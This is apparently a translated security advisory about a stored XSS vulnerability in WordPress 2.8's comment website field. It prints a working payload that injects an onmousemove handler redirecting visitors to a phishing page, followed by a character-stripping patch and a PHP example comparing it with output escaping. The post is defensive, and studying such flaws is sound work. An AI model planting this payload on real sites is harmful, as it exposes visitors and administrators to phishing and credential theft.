WordPress 2.8 XSS 0DAY Vulnerability

pop: Someone posted this in the group today, and I did a rough translation. It looks like a cross-site scripting vulnerability. 鬼仔 (Guizai) has an analysis of it as well; the link is at the end.

It has been published that all versions of WordPress 2.8 suffer from an XSS vulnerability. Attackers can use it for phishing: they build a WordPress login page that looks exactly like your own. If you are not careful, your password is sent to the attacker's website. With your password they can edit pages and upload a webshell. It is harmful.

How does the attacker do this? (How is the intrusion carried out?)
They insert a website URL like this (in the comment form's website field):

http://www.vul.kr' onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

If someone (or an administrator) moves the mouse over the comment author's website link, the browser jumps to another URL, which is a phishing page.

How can we patch it? (How do we apply the patch?)

Edit wp-comments-post.php, go to line 40 and add:
$comment_author_url = str_replace(chr(39), '', $comment_author_url); // remove single quotes (')
$comment_author_url = str_replace(chr(59), '', $comment_author_url); // remove semicolons (;)
$comment_author_url = str_replace(chr(44), '', $comment_author_url); // remove commas (,)
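The following is an added example (not from the original post or from WordPress itself) that shows why the patch above stops this payload and compares it with escaping at output time. It assumes a template that prints the author URL inside a single-quoted href attribute, as the payload targets; the function and variable names are my own.

```php
<?php
// Constructed sample: the payload from the post, written with straight quotes.
$payload = "http://www.vul.kr' onmousemove='location.href=String.fromCharCode(104,116,116,112)";

// The patch from the post: strip ' ; , from the stored comment author URL.
function patch_from_post(string $url): string {
    foreach ([chr(39), chr(59), chr(44)] as $c) {
        $url = str_replace($c, '', $url);
    }
    return $url;
}

// Output-time handling: keep only a well-formed http/https URL, then
// escape it for an attribute so that both ' and " become entities.
function safe_author_url(string $url): string {
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

// Assumed template: the author URL is placed inside a single-quoted href.
function render_author_link(string $href, string $name): string {
    return "<a href='" . $href . "' rel='external nofollow'>" . $name . "</a>";
}

// Unfiltered: the ' in the payload closes the attribute and the rest becomes
// an onmousemove handler. Patched: with ' removed, everything stays inside the
// attribute value. Escaped: the URL is rejected as malformed, so nothing is printed.
echo "patched: " . render_author_link(patch_from_post($payload), 'author') . "\n";
echo "escaped: " . render_author_link(safe_author_url($payload), 'author') . "\n";
```

Note that the patch only removes the single quote, so it protects a template that quotes the attribute with '; escaping with ENT_QUOTES at output time covers either quoting style.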

Finally, a reminder for webmasters:
Webmasters, please patch it as soon as you can.

WordPress 2.8.1 comment display XSS vulnerability
http://huaidan.org/archives/3228.html

Be Careful, WordPress 2.8 All Version XSS 0DAY
http://www.vul.kr/?p=569
